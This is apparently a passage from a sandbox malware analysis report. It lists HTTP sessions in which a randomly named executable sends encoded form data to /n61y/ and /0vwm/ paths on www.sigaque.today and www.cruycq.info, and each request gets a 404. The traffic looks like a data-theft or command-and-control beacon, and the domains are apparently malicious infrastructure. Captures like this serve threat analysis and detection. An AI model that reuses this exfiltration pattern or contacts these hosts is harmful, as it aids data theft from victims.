                                                            Date: Tue, 01 Apr 2025 07:04:13 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1giYocPV4iM8un99%2BjzPQNTksSicE47h7r6M%2Bbma8nXqEYvqPTc6zEF%2FJHLabd8TS8fJkwYUTproC48GzrN%2FbVJhrp334Lm1Evb%2BtkEcRNBhEl%2BbNbwTjKhWgz2wMMqdn0dwTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 92963b2d4a8842da-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=93653&min_rtt=93653&rtt_var=46826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a
                                                            Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
                                                            Apr 1, 2025 09:04:13.975910902 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.449729104.21.32.1806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:16.238420963 CEST747OUTPOST /n61y/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.sigaque.today
                                                            Origin: http://www.sigaque.today
                                                            Referer: http://www.sigaque.today/n61y/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 4d 4d 4e 2f 52 4e 35 57 46 46 6b 46 66 4b 34 61 6f 4e 4f 41 47 39 4b 67 53 47 4f 48 37 61 7a 56 61 53 51 77 36 30 2b 48 43 42 58 5a 50 44 41 69 64 71 6e 52 42 64 62 6f 50 2b 4f 62 72 70 56 64 36 35 6b 61 58 44 48 6d 72 58 4c 33 44 34 47 53 54 55 54 51 4c 5a 32 47 68 6c 6f 4f 49 6d 78 45 51 42 6c 43 35 39 66 61 70 30 43 71 50 4f 48 6d 42 30 57 47 31 43 74 6b 75 42 38 45 42 37 2f 6f 2f 55 75 59 32 67 74 4c 39 2b 72 41 72 32 75 31 67 7a 62 66 64 75 4c 4a 4d 46 55 6a 66 6a 69 4f 63 2b 6a 73 2f 6f 42 47 38 72 6e 67 73 44 4e 70 36 56 78 4c 41 6b 4e 5a 63 49 6f 34 43 67 72 49 48 71 4d 34 61 53 69 39 46 2f 2f 7a 4f 31 77 64 4e 76 52 73 57 6d 38 3d
                                                            Data Ascii: u8S0Yd=MMN/RN5WFFkFfK4aoNOAG9KgSGOH7azVaSQw60+HCBXZPDAidqnRBdboP+ObrpVd65kaXDHmrXL3D4GSTUTQLZ2GhloOImxEQBlC59fap0CqPOHmB0WG1CtkuB8EB7/o/UuY2gtL9+rAr2u1gzbfduLJMFUjfjiOc+js/oBG8rngsDNp6VxLAkNZcIo4CgrIHqM4aSi9F//zO1wdNvRsWm8=
                                                            Apr 1, 2025 09:04:16.604953051 CEST1009INHTTP/1.1 404 Not Found
                                                            Date: Tue, 01 Apr 2025 07:04:16 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7ydtDJLN%2F8Tl4hlK3hVElUrHhf4x5JZ24Az1D%2F0frQHs3Htd6sazyOOA2QaUvO%2FX0Yn46HtzRWKutXBZuV8688doX4SGTppP0DFMXIoIq%2FyQ%2FaCN8HHwWSebU77P7GSw9CTqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 92963b3dcb48438e-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=99818&min_rtt=99818&rtt_var=49909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a
                                                            Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
                                                            Apr 1, 2025 09:04:16.605211973 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.449730104.21.32.1806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:18.881954908 CEST7004OUTPOST /n61y/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 6479
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.sigaque.today
                                                            Origin: http://www.sigaque.today
                                                            Referer: http://www.sigaque.today/n61y/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 4d 4d 4e 2f 52 4e 35 57 46 46 6b 46 66 4b 34 61 6f 4e 4f 41 47 39 4b 67 53 47 4f 48 37 61 7a 56 61 53 51 77 36 30 2b 48 43 42 50 5a 50 79 67 69 63 4e 37 52 41 64 62 6f 46 65 4f 65 72 70 56 4d 36 35 38 65 58 44 61 45 33 31 50 33 43 72 75 53 54 78 48 51 49 70 32 47 31 56 70 48 44 47 78 64 51 42 31 47 35 39 6a 61 70 30 2b 71 50 4f 48 6d 41 68 69 47 72 69 74 6d 75 42 39 64 49 62 2f 73 2f 55 75 36 32 69 41 57 39 4e 7a 41 72 57 2b 31 6d 42 44 66 57 75 4c 50 42 6c 55 46 66 6a 75 4e 63 2b 4c 34 2f 70 70 57 39 65 72 67 75 31 59 4e 2f 55 64 4c 63 32 46 63 42 2f 45 4e 4c 6d 72 61 4a 6f 39 47 65 33 71 56 61 65 7a 6c 45 58 41 59 53 50 35 71 4d 51 4b 4a 63 76 69 5a 71 43 6b 38 77 49 63 62 51 48 62 2b 2b 68 6c 2f 54 57 71 47 62 57 42 4d 32 58 6c 2f 30 57 4b 4d 59 67 33 64 42 2f 36 6c 49 33 46 68 51 2f 33 5a 36 57 48 72 61 2b 51 67 61 65 47 56 59 78 50 6e 79 61 2f 59 4d 4e 72 30 6b 4e 6c 38 6f 4e 66 38 65 44 5a 37 39 38 68 4c 66 6c 71 30 36 62 61 54 36 35 69 43 39 41 6e 5a 72 6a 37 37 68 47 30 [TRUNCATED]
                                                            Data Ascii: u8S0Yd=MMN/RN5WFFkFfK4aoNOAG9KgSGOH7azVaSQw60+HCBPZPygicN7RAdboFeOerpVM658eXDaE31P3CruSTxHQIp2G1VpHDGxdQB1G59jap0+qPOHmAhiGritmuB9dIb/s/Uu62iAW9NzArW+1mBDfWuLPBlUFfjuNc+L4/ppW9ergu1YN/UdLc2FcB/ENLmraJo9Ge3qVaezlEXAYSP5qMQKJcviZqCk8wIcbQHb++hl/TWqGbWBM2Xl/0WKMYg3dB/6lI3FhQ/3Z6WHra+QgaeGVYxPnya/YMNr0kNl8oNf8eDZ798hLflq06baT65iC9AnZrj77hG0LsoOscd8X4pUM7XPqTR2fs9KNPDxMNVYEAuXwT/VqfbhP/Gb+7sKsvqsuDNJNHnJ49vsAowz+M14MpKlyrwdJ6u5cqq+pg7oWhXajbf/eEy3dPmPOk4T0A5bmVSqn64enQP7WhnQtsKLPcQ/23wKwwMVJTkvddJpLaoYqjO/k2LhP85B48t3JHO1sOP/I5nIcc28dqAC1Z5nuuGQ3XNFEbYvFI9OK3uQBNC3/lt3J/Vcl5+yUn3RnwwuilUDHZXmXxpmGbK7/5op2Ry3aUcfPCLSPGnqx4FoutBHBPkE9g/R9TJAqAXDX98YM14yGS0UzYgNx+t33rE2UO38FcXTtGGI1tmMDs7nVWhtzLg0vkxz5ggTvh3jWp7Co3/yWCU7vJAQYRGY1BP3X/fwqlYr8vnBknUyh4FvVALZHWC2miXqdwceMPQ/0+uOihmp4WJpjw8p/WgI3L1UUrG6u6bpzz/WPuNrgDDhxZiPFxCQxB10BxRc4Jay9zmrIYfHT6cTm+N7cxtopp09KoRu/v+b5bvAeemAfOLfRn34vcsm9AhgQi9SoqBWVJgwAZHGu+g/qacWQUpaJg9ncJtZqzDjQBqima6B9z6OwM9PUwOxXbgv65h2vsG7voZ5pPEs5Xy0VhLx8P/AcPLZy99/olRMtqLPwOJ9JfDob/ [TRUNCATED]
                                                            Apr 1, 2025 09:04:19.255834103 CEST1008INHTTP/1.1 404 Not Found
                                                            Date: Tue, 01 Apr 2025 07:04:19 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cggA0wmiT0jKnh6xIWBkdquHQN95AU13jnShtu5EqCnP4LpDy6FrTZNa6Kz%2FBywhAsuRztA89LlRQ1w%2BVe8S73S9p9FJubGSjopAfGdnsbNbK%2FYF%2FVAJC6Twhvq32RS7JA3WQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 92963b4e4df88c47-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=98150&min_rtt=98150&rtt_var=49075&sent=2&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7004&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a
                                                            Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
                                                            Apr 1, 2025 09:04:19.255867004 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.449731104.21.32.1806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:21.556158066 CEST460OUTGET /n61y/?u8S0Yd=BOlfS7N9ZWkGRIMQvtCcANCNb3qAqq3eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBL6eCiEJPRGlRejti0K3snW3AOM+4UQW8vy0=&rvNTa=V4hx68Jpk HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.sigaque.today
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:04:21.919503927 CEST1031INHTTP/1.1 404 Not Found
                                                            Date: Tue, 01 Apr 2025 07:04:21 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKnbKusfi5Uq1hNmMg%2BzEHhJaNjSL4c6KRIa6PV8rs3vnSSBJZ3EDxr4Y4OyG42xVFgtSPxtM9aj0K%2FkSpOQ3BfFYbrM%2FH%2B2bQqK3O%2FQmozbXWz0sUZiRCChMJNXoCe7IW3TSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 92963b5f0bb81819-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=97244&min_rtt=97244&rtt_var=48622&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c
                                                            Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page --><
                                                            Apr 1, 2025 09:04:21.919523001 CEST336INData Raw: 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74
                                                            Data Ascii: !-- a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome f
                                                            Apr 1, 2025 09:04:21.919533014 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.44973247.83.1.90806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:53.818047047 CEST721OUTPOST /0vwm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 203
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.cruycq.info
                                                            Origin: http://www.cruycq.info
                                                            Referer: http://www.cruycq.info/0vwm/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 76 75 78 71 4d 6b 4d 67 54 34 71 68 39 55 66 46 56 42 49 2f 32 54 74 41 58 47 4d 41 7a 46 4a 6a 65 35 72 5a 74 76 70 45 76 41 47 6f 55 48 59 6e 77 33 4b 45 48 79 4f 64 45 2f 48 65 5a 2b 37 30 33 6d 6e 77 77 35 54 79 71 6d 6a 76 4e 75 64 64 4d 63 71 35 61 5a 70 72 61 6c 6d 34 4a 2f 33 59 68 58 34 6b 4b 4d 4b 58 68 46 4c 6a 47 38 46 4c 62 77 77 4a 56 67 59 31 44 78 7a 41 42 67 62 76 2b 34 55 55 52 63 77 4d 57 62 64 56 4d 43 55 6d 48 69 5a 4d 4e 46 50 57 72 35 2f 77 78 58 41 76 74 6b 45 6a 49 77 38 46 6c 2f 7a 4b 46 44 6a 4c 63 69 47 2b 39 59 5a 47 72 4e 7a 52 63 61 58 71 39 67 3d 3d
                                                            Data Ascii: u8S0Yd=vuxqMkMgT4qh9UfFVBI/2TtAXGMAzFJje5rZtvpEvAGoUHYnw3KEHyOdE/HeZ+703mnww5TyqmjvNuddMcq5aZpralm4J/3YhX4kKMKXhFLjG8FLbwwJVgY1DxzABgbv+4UURcwMWbdVMCUmHiZMNFPWr5/wxXAvtkEjIw8Fl/zKFDjLciG+9YZGrNzRcaXq9g==
                                                            Apr 1, 2025 09:04:54.638560057 CEST114INHTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:04:54 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.44973347.83.1.90806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:56.647674084 CEST741OUTPOST /0vwm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 223
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.cruycq.info
                                                            Origin: http://www.cruycq.info
                                                            Referer: http://www.cruycq.info/0vwm/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 76 75 78 71 4d 6b 4d 67 54 34 71 68 76 6b 76 46 51 6d 55 2f 7a 7a 74 42 4c 57 4d 41 35 6c 49 4c 65 35 33 5a 74 75 39 55 76 79 69 6f 58 6d 6f 6e 78 31 79 45 47 79 4f 64 63 76 48 58 45 75 36 32 33 6d 72 43 77 39 62 79 71 6d 48 76 4e 76 74 64 4e 72 32 36 49 35 70 74 63 6c 6e 65 48 66 33 59 68 58 34 6b 4b 4d 4f 78 68 46 54 6a 47 4d 56 4c 61 54 6f 57 55 67 59 30 45 78 7a 41 46 67 62 72 2b 34 56 44 52 5a 51 71 57 5a 56 56 4d 47 51 6d 47 7a 5a 4e 44 46 50 71 76 35 2b 45 35 6d 6b 6a 71 48 6b 69 4c 67 39 6a 6a 66 33 4a 45 46 75 52 4e 54 6e 70 76 59 39 31 32 4b 36 6c 52 5a 71 6a 6d 71 73 79 62 58 6b 74 4b 76 30 4f 76 2b 51 6a 41 39 35 6d 79 71 4d 3d
                                                            Data Ascii: u8S0Yd=vuxqMkMgT4qhvkvFQmU/zztBLWMA5lILe53Ztu9UvyioXmonx1yEGyOdcvHXEu623mrCw9byqmHvNvtdNr26I5ptclneHf3YhX4kKMOxhFTjGMVLaToWUgY0ExzAFgbr+4VDRZQqWZVVMGQmGzZNDFPqv5+E5mkjqHkiLg9jjf3JEFuRNTnpvY912K6lRZqjmqsybXktKv0Ov+QjA95myqM=
                                                            Apr 1, 2025 09:04:57.658437014 CEST114INHTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:04:57 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.44973447.83.1.90806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:04:59.477433920 CEST6998OUTPOST /0vwm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 6479
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.cruycq.info
                                                            Origin: http://www.cruycq.info
                                                            Referer: http://www.cruycq.info/0vwm/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 75 38 53 30 59 64 3d 76 75 78 71 4d 6b 4d 67 54 34 71 68 76 6b 76 46 51 6d 55 2f 7a 7a 74 42 4c 57 4d 41 35 6c 49 4c 65 35 33 5a 74 75 39 55 76 79 71 6f 58 55 67 6e 78 53 6d 45 46 79 4f 64 43 2f 48 53 45 75 36 33 33 6d 7a 47 77 39 58 49 70 56 7a 76 4d 39 46 64 4b 49 65 36 57 5a 70 74 56 46 6d 32 44 66 33 6b 68 57 49 67 4b 4d 4b 78 68 45 2f 6a 47 4d 56 4c 61 41 77 57 57 77 59 32 45 78 7a 30 50 41 62 76 2b 34 55 55 52 63 6f 36 57 4a 31 56 56 69 30 6d 42 42 68 4e 4c 46 50 53 69 5a 2b 63 35 6d 59 67 71 48 39 31 4c 68 55 34 67 72 72 4a 45 69 4c 34 49 54 2f 67 39 70 34 72 74 35 4f 67 5a 37 43 49 6a 4c 6b 39 57 30 6b 73 61 39 67 78 6a 66 35 70 45 63 31 6d 6e 4f 6e 51 5a 4a 33 31 61 36 2f 34 4b 4e 54 72 36 2b 57 4b 52 59 75 30 6f 43 30 55 55 41 61 67 4a 52 7a 71 45 53 48 6d 65 30 33 48 2b 6f 6a 2f 6d 49 50 51 59 6b 65 72 4b 70 4c 76 61 6a 41 54 55 4f 53 63 6a 79 4c 63 45 31 4e 78 45 36 76 71 68 6e 4e 44 42 51 34 35 6f 55 58 43 4f 4a 55 6c 57 58 45 67 41 39 32 6d 77 6c 52 71 45 65 2f 38 72 45 32 2b 71 68 48 [TRUNCATED]
                                                            Data Ascii: u8S0Yd=vuxqMkMgT4qhvkvFQmU/zztBLWMA5lILe53Ztu9UvyqoXUgnxSmEFyOdC/HSEu633mzGw9XIpVzvM9FdKIe6WZptVFm2Df3khWIgKMKxhE/jGMVLaAwWWwY2Exz0PAbv+4UURco6WJ1VVi0mBBhNLFPSiZ+c5mYgqH91LhU4grrJEiL4IT/g9p4rt5OgZ7CIjLk9W0ksa9gxjf5pEc1mnOnQZJ31a6/4KNTr6+WKRYu0oC0UUAagJRzqESHme03H+oj/mIPQYkerKpLvajATUOScjyLcE1NxE6vqhnNDBQ45oUXCOJUlWXEgA92mwlRqEe/8rE2+qhHfbzbfZEBIkoiiuFDxl+k8XC+l79LS2HzPsKIc3riheVSR8DylI3akTZ4m/AoTgrzK+T+Cx9KYDs2IH6aa/aK7lr7ckSpL1OZySAwY2XSGeOPhhOXFSB+osdH87v9MJrIt6XkZ++070e6TnbuqyLDyU9K+KpXChOQasFEkTS14Yj9RSFWYqgXbIEpZefQV5bd4GJaxUz3Ta6fJTH4gahW9LON9EjwXD6IO6VQDhpBVennjCrNAW4fiQ6/psexE+kRISTLt2mwZl4woEohiKo7f5Om68LCLerhyjq+C6bCjfTR8jCPxTq38aejbkJiwXBdBNY6H8f2VaDhGVgeCyNuwM0q/2IFPkwkWkWsufUt9kKyNwmQYkT8in0IYc8Hm6v1mci+3ccWZ0rvLqEi6fHqa7HvxsihEA3m0tYtmR3c9r+P7RgEsoBRwabg078TwnXvvQ6KJ1dYQNZPOOJXi5rDh9sJrysO6/folKue069kOujVG5vh9LWRizW5MiAoBI2IrCnyBS6bx9z6t+zq1VOvw/8ZuN8koBpDUt6boe+XvsPGq1eYGkULK9KpAST3nzlyOFhfpWoWBchX7FQpO0DLafGAg72g2FrdDPSPOQ10jfIcyfEUBnCLkIb2P+Kem4KjPzoBjlMnk8zAKmXZc/Im6aTX963TV3g2sO [TRUNCATED]
                                                            Apr 1, 2025 09:05:00.518054962 CEST114INHTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:00 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.44973547.83.1.90806292C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 1, 2025 09:05:02.323060036 CEST458OUTGET /0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.cruycq.info
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Apr 1, 2025 09:05:03.321115971 CEST114INHTTP/1.1 404
                                                            Server: nginx/1.18.0
                                                            Date: Tue, 01 Apr 2025 07:05:03 GMT
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
